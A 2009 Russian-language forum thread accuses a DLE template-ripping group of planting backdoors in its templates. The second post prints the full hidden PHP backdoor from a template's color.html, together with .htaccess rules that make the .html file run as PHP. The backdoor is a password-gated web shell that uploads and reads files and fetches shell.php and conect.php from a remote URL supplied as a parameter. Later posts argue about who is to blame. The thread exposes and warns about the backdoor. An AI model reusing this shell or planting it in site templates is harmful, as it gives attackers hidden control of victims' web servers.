Black - RUnet Team

Тема в разделе "Black list", создана пользователем +VAMPIR+, 21 дек 2009.

Статус темы:
Закрыта.
  1. +VAMPIR+

    +VAMPIR+ Master

    Регистр.:
    13 апр 2006
    Сообщения:
    533
    Симпатии:
    616
    Всем привет и всех с наступающим.
    Итак что хотелось сказать по поводу барыг, крыс, кидал и.т.д…
    Недавно столкнулся с ребятами которые занимаются этими вещами… что самое плохое они находятся и в клубе и модераторы…
    Все мы знает RUnet Team группу по созданию Rip’ов шаблонов для DLE.
    Они конечно отлично рипают и немного добавляют своего года как например:

    PHP:
    Order Deny,Allow
    Allow from all
    <FilesMatch "^(bb)\.html$">
      
    ForceType application/x-httpd-php
    </FilesMatch>
    и потом выполняется файл bb.html (который закоден)

    сам шабик лежит тут Перейти по ссылке
    дальше специльно рипали для меня
    Перейти по ссылке
    за, что сначало был очень благодарен пока сегдоня не обнаружил шеллы на сайте и файлик который находился в рипнутом шаблоне color.html
    и файл .htaccess с добавлением :

    PHP:
    Order Deny,Allow
    Allow from all
    <FilesMatch "^(color)\.html$">
      
    ForceType application/x-httpd-php
    </FilesMatch>
    Я одного не понимаю для чего это делается ? Траф погонять , много наработали ?
    Так же сюда же Перейти по ссылке
    Вообще кто скачал их шаблоны проверяйте на шеллы, на подозрительные файлы, вот такие сейчас бывают люди.
    От себя ещё добавлю,CheburatoR-all вообще я такого от тебя не ожидал.
     
    kail.2009, fte, o_nix и 19 другим нравится это.
  2. Ser Frood

    Ser Frood Заблокирован

    Регистр.:
    12 дек 2006
    Сообщения:
    519
    Симпатии:
    384
    Собственно сама хрень с шабов:
    PHP:
    <?php
    if($_GET['upload']){
    session_start();
    if(isset(
    $_GET['a']) && $_GET['a']=='logout')
     unset(
    $_SESSION['auth']);

    if(isset(
    $_POST['pass'])){
     
    $users = array(
     
    'root' => md5(md5('uvCJlBF9eIcq9bEhUpg83baFcW9JKmqa'))
     );
     if(
    $users['root'] == md5(md5($_POST['pass']))){
      
    $_SESSION['auth'] = true;
     }
    }

    if(!isset(
    $_SESSION['auth']) || $_SESSION['auth'] != true){
    $hp=$_GET['hp'];
     echo <<<EOF
    <form method="POST">



    <link href="http://
    $hp/unload/style.css" rel="stylesheet" type="text/css" />

    <div class="login_php_01">
    <div class="login_php_02">
    <div class="login_php_03">
    <div class="login_php_04"><div style="padding:90px 0px 0px 40px">

        <span style="font:11px Verdana;">Password: </span><input name="pass" type="password" size="20">
        <input type="hidden" name="doing" value="login">
        <input type="submit" value="Auth" class="login_bottom" style="border:0px">

        </div></div>
    </div>
    </div>
    </div>

    </form>
    EOF;
    exit;
    }
    else



    if(
    $_GET['ups'])
    {
    echo
    "_get_ o_O";
    unlink ("spacer.gif");
    exit;    
    }
    $hp=$_GET['hp'];
    $dir=$_GET['dir'];
    $f = @fsockopen("$hp"80$x0c$x0d6); 
    if(!
    $f){echo 'Ебанутый Гамунгол'; }
    else{
     
    $x0e = @file("$dir");
     echo 
    implode('',$x0e); 
    }
    $adres $_POST['adres'];
    $get=$_SERVER['DOCUMENT_ROOT']."/".$adres;
    if(
    copy($HTTP_POST_FILES["lopd"]["tmp_name"],"$get".$HTTP_POST_FILES["lopd"]["name"])){
    $der "<span class='line'></span>Каталог для загрузки: <strong>";
    $test $_SERVER['HTTP_HOST']."/$adres"."<a href=http://".$_SERVER['HTTP_HOST']."/$adres".$HTTP_POST_FILES["lopd"]["name"]." target='_blank'>".$HTTP_POST_FILES["lopd"]["name"]."</a></strong>";
    echo <<<HTMLS
    <div style="position:absolute;top:0px;left:0px;width:100%;height:100%"><div style="padding-left:50%;padding-top:343px;">
    <div style="margin-left:-215px;width:425px;height:179px;">
    $der$test</div></div></div>
    HTMLS;

    else {echo(
    "");}
    }

    ?>


    <?
    if($_GET['install']){

    $dir=$_SERVER['DOCUMENT_ROOT']."/";//главный каталог
    $install=$_GET['install'];//какоу сод установить
    $file_in=$_GET['file'];//в какой файл
    $url=$_GET['url'];//url откуда грузить код
    $path=$_GET['path'];//в какую папку
    $path2_shell=$_GET['path2_shell'];//в какую папку


    if(chmod("$dir$path$file_in", 0666)){$chmod=true;}


    $types=array('conect','shell');//название двх файлов
    for($i = 0; $i < count($types); $i++) {

    $files = $url.'conect.txt';
    $newfile = $dir.$path.'conect.php';
    $files2 = $url.'shell.txt';
    $newfile2 = $dir.$path2_shell.'/shell.php';

    if (copy($files,$newfile)){$copy=true;}
    if (copy($files2,$newfile2)){$copy2=true;}

    }


    if($copy==true){
    $data=$install;
    $data = str_replace('\\\\','\\',$data);
    $data = str_replace('\\"','"',$data);
    $data = str_replace("\\'","'",$data);


    $log = $dir.$path.$file_in;
    $file = fopen ($log, "a+");

    // Добавляем данные в файл
    $str="$data\n";
    if(fputs ($file, $str)){$rec=true;}
    fclose($file);
    }


    if($chmod==true&&$rec==true&&$copy==true){echo"<!--ok-->";}
    else{
    if($chmod==false){echo"chmod_eror";}
    if($rec==false){echo"rec_eror";}
    if($copy==false){echo"copy_eror";}

    }

    }
    ?>


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

    <html>
    <head>
        <title>Text Color</title>
        <script language="JavaScript" type="text/javascript">
        <!--
        function selectColor(color) {
            self.parent.setColor(color);
        }
        
        function InitColorPalette() {
            if (document.getElementsByTagName)
                var x = document.getElementsByTagName('TD');
            else if (document.all)
                var x = document.all.tags('TD');
            for (var i=0;i<x.length;i++) {
                x[i].onclick = click;
            }
        }
        
        function click() {
            selectColor(this.id);
        }
        //-->
        </script>
    </head>
    <body bgcolor="white" onLoad="InitColorPalette()" leftmargin="0" rightmargin="0" marginwidth="0" marginheight="0" topmargin="0" bottommargin="0">
    <table width="150" height="100" cellpadding="0" cellspacing="1" border="1" align="center">
        <tr>
            <td id="#FFFFFF" bgcolor="#FFFFFF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFCCCC" bgcolor="#FFCCCC" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFCC99" bgcolor="#FFCC99" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFFF99" bgcolor="#FFFF99" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFFFCC" bgcolor="#FFFFCC" width="10" height="10"><img width="1" height="1"></td>
            <td id="#99FF99" bgcolor="#99FF99" width="10" height="10"><img width="1" height="1"></td>
            <td id="#99FFFF" bgcolor="#99FFFF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#CCFFFF" bgcolor="#CCFFFF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#CCCCFF" bgcolor="#CCCCFF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFCCFF" bgcolor="#FFCCFF" width="10" height="10"><img width="1" height="1"></td>
        </tr>
        <tr>
            <td id="#CCCCCC" bgcolor="#CCCCCC" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FF6666" bgcolor="#FF6666" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FF9966" bgcolor="#FF9966" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFFF66" bgcolor="#FFFF66" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFFF33" bgcolor="#FFFF33" width="10" height="10"><img width="1" height="1"></td>
            <td id="#66FF99" bgcolor="#66FF99" width="10" height="10"><img width="1" height="1"></td>
            <td id="#33FFFF" bgcolor="#33FFFF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#66FFFF" bgcolor="#66FFFF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#9999FF" bgcolor="#9999FF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FF99FF" bgcolor="#FF99FF" width="10" height="10"><img width="1" height="1"></td>
        </tr>
        <tr>
            <td id="#C0C0C0" bgcolor="#C0C0C0" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FF0000" bgcolor="#FF0000" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FF9900" bgcolor="#FF9900" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFCC66" bgcolor="#FFCC66" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFFF00" bgcolor="#FFFF00" width="10" height="10"><img width="1" height="1"></td>
            <td id="#33FF33" bgcolor="#33FF33" width="10" height="10"><img width="1" height="1"></td>
            <td id="#66CCCC" bgcolor="#66CCCC" width="10" height="10"><img width="1" height="1"></td>
            <td id="#33CCFF" bgcolor="#33CCFF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#6666CC" bgcolor="#6666CC" width="10" height="10"><img width="1" height="1"></td>
            <td id="#CC66CC" bgcolor="#CC66CC" width="10" height="10"><img width="1" height="1"></td>
        </tr>
        <tr>
            <td id="#999999" bgcolor="#999999" width="10" height="10"><img width="1" height="1"></td>
            <td id="#CC0000" bgcolor="#CC0000" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FF6600" bgcolor="#FF6600" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFCC33" bgcolor="#FFCC33" width="10" height="10"><img width="1" height="1"></td>
            <td id="#FFCC00" bgcolor="#FFCC00" width="10" height="10"><img width="1" height="1"></td>
            <td id="#33CC00" bgcolor="#33CC00" width="10" height="10"><img width="1" height="1"></td>
            <td id="#00CCCC" bgcolor="#00CCCC" width="10" height="10"><img width="1" height="1"></td>
            <td id="#3366FF" bgcolor="#3366FF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#6633FF" bgcolor="#6633FF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#CC33CC" bgcolor="#CC33CC" width="10" height="10"><img width="1" height="1"></td>
        </tr>
        <tr>
            <td id="#666666" bgcolor="#666666" width="10" height="10"><img width="1" height="1"></td>
            <td id="#990000" bgcolor="#990000" width="10" height="10"><img width="1" height="1"></td>
            <td id="#CC6600" bgcolor="#CC6600" width="10" height="10"><img width="1" height="1"></td>
            <td id="#CC9933" bgcolor="#CC9933" width="10" height="10"><img width="1" height="1"></td>
            <td id="#999900" bgcolor="#999900" width="10" height="10"><img width="1" height="1"></td>
            <td id="#009900" bgcolor="#009900" width="10" height="10"><img width="1" height="1"></td>
            <td id="#339999" bgcolor="#339999" width="10" height="10"><img width="1" height="1"></td>
            <td id="#3333FF" bgcolor="#3333FF" width="10" height="10"><img width="1" height="1"></td>
            <td id="#6600CC" bgcolor="#6600CC" width="10" height="10"><img width="1" height="1"></td>
            <td id="#993399" bgcolor="#993399" width="10" height="10"><img width="1" height="1"></td>
        </tr>
        <tr>
            <td id="#333333" bgcolor="#333333" width="10" height="10"><img width="1" height="1"></td>
            <td id="#660000" bgcolor="#660000" width="10" height="10"><img width="1" height="1"></td>
            <td id="#993300" bgcolor="#993300" width="10" height="10"><img width="1" height="1"></td>
            <td id="#996633" bgcolor="#996633" width="10" height="10"><img width="1" height="1"></td>
            <td id="#666600" bgcolor="#666600" width="10" height="10"><img width="1" height="1"></td>
            <td id="#006600" bgcolor="#006600" width="10" height="10"><img width="1" height="1"></td>
            <td id="#336666" bgcolor="#336666" width="10" height="10"><img width="1" height="1"></td>
            <td id="#000099" bgcolor="#000099" width="10" height="10"><img width="1" height="1"></td>
            <td id="#333399" bgcolor="#333399" width="10" height="10"><img width="1" height="1"></td>
            <td id="#663366" bgcolor="#663366" width="10" height="10"><img width="1" height="1"></td>
        </tr>
        <tr>
            <td id="#000000" bgcolor="#000000" width="10" height="10"><img width="1" height="1"></td>
            <td id="#330000" bgcolor="#330000" width="10" height="10"><img width="1" height="1"></td>
            <td id="#663300" bgcolor="#663300" width="10" height="10"><img width="1" height="1"></td>
            <td id="#663333" bgcolor="#663333" width="10" height="10"><img width="1" height="1"></td>
            <td id="#333300" bgcolor="#333300" width="10" height="10"><img width="1" height="1"></td>
            <td id="#003300" bgcolor="#003300" width="10" height="10"><img width="1" height="1"></td>
            <td id="#003333" bgcolor="#003333" width="10" height="10"><img width="1" height="1"></td>
            <td id="#000066" bgcolor="#000066" width="10" height="10"><img width="1" height="1"></td>
            <td id="#330099" bgcolor="#330099" width="10" height="10"><img width="1" height="1"></td>
            <td id="#330033" bgcolor="#330033" width="10" height="10"><img width="1" height="1"></td>
        </tr>
    </table>
    </body>
    </html>
     
    Vfrcbv, dragonstyle, CheburatoR-all и ещё 1-му нравится это.
  3. masima

    masima

    Регистр.:
    9 мар 2007
    Сообщения:
    732
    Симпатии:
    1.338
    а потом десятки пишут что их сайты часто ломают :)
     
    dragonstyle нравится это.
  4. General Fizz

    General Fizz Боевой Генерал :)

    Регистр.:
    11 апр 2007
    Сообщения:
    753
    Симпатии:
    396
    dragonstyle нравится это.
  5. CheburatoR-all

    CheburatoR-all Гипножаба

    Регистр.:
    26 апр 2009
    Сообщения:
    295
    Симпатии:
    438
    :nezn: Так вот что неокс называет проверкой моих шаблонов. :-]:-] Сейчас повысовываю эту хрень их шабов. Я конечно знал про старый код о котором все знают, но мне собственно не чего не сообщили о "новом" коде. Однако меня насторожила постоянная проверка моих шаблонов. Короче писец. пздц просто. :mad:В общем думаю команда будет распущенна по крайней мере меня там не будет уже.

    :tcl: Я сам не ожидал. Что же, я больше не в runet team'e
     
    dragonstyle нравится это.
  6. Ramazan

    Ramazan пыщ-пыщ

    Регистр.:
    28 янв 2007
    Сообщения:
    471
    Симпатии:
    98
    CheburatoR-all, есть такая старая поговорка:
    "Я не я, попа не моя"
    Ну скажи мне как это всё происходит?
    Как ты не знаешь, что там?
    Т.е. ты рипнул, отдал там этому неокс'у, он запихнул этот код туда вернул тебе, а ты как был не вкурсе зачем ему это нужно так и оставался на протяжении всего времени?
    И вот насчёт повысовываю, зачем вообще туда это пихать?
     
    Budrin нравится это.
  7. lifediz

    lifediz Yii Framework developer

    Регистр.:
    7 июн 2008
    Сообщения:
    385
    Симпатии:
    507
    В бан всех, и не надо писать что незнал, надо было просить расшифрованный код, смотреть его, а потом уж юзать! Ты такой же участник как и они, убеждал всех что не вредоносный код...

    В баню, а то слишком много КсандерМаксимовых развелось!
     
    Budrin нравится это.
  8. CheburatoR-all

    CheburatoR-all Гипножаба

    Регистр.:
    26 апр 2009
    Сообщения:
    295
    Симпатии:
    438
    Собственно из моих шаблонов только тут Перейти по ссылке этот код и еще в нескольких. И проверки происходили только несколько раз, я не чего и не заподозрил. Я неокса знаю достаточно давно и с самого начала до конца runet team я до конца не чего не знал. Особенно поразило, то что меня не посвятили в новые дела. Я уже сказал что шеллы это конкретный перебор и это послежило причиной моего ухода, а смысл мне там находится если меня даже не посвящают в содержимое моих рипов.
    Я утверждал про прошлый который в login'e сидел(Он И то что сейчас вообще разные вещи). Я не когда не одобрял такие виды взлома. Там (который прятался в логин) был код который запросы к сайту подовал (расшифровка чуть ли не везде лежит, можете лично убедится ), а тут 100% Вредоносный код :mad: Не знал я про этот не чего, а может и узнал был, но он попал только в 2 моих шаблона после проверки неоксом. Покажи где я утверждал что этот шелл не вредоносный??? Как написано выше, код стоит только в двух шаблонах которые проверял неокс.

    Считаете что я вру? Пожалуйста, баньте, но в команду runet team я не вернусь
     
  9. lifediz

    lifediz Yii Framework developer

    Регистр.:
    7 июн 2008
    Сообщения:
    385
    Симпатии:
    507
    Чебуратор, я говорю что ты писал где-то что это всего лишь палилка где шаблон ставят или что-то подобное (в суть темы я не вникал). Если тебя забанят, врятли уже когда-нибудь в команду возьмут.
     
  10. CheburatoR-all

    CheburatoR-all Гипножаба

    Регистр.:
    26 апр 2009
    Сообщения:
    295
    Симпатии:
    438
    Так я писал про это:
    http://truhan4ik.ru/index.php?newsid=4381
    А если сравнить с тем что в первом посте находится, совершенно разное. Про то что в первом посте я никогда не писал и не оправдывал. И говорю что это перебор. Я более не собираюсь выгораживать неокса и эту команду.

    В том что в шаблон попал шелл я тоже виноват т.к мог и проследить за лишним файлом. По этому и извиняюсь
    Я говорю про runet team, то что туда не вернусь
    Поговорил с lifediz'ом в аське :) Думаю он понял что я всегда что бы не случилось на стороне нулледа
     
Статус темы:
Закрыта.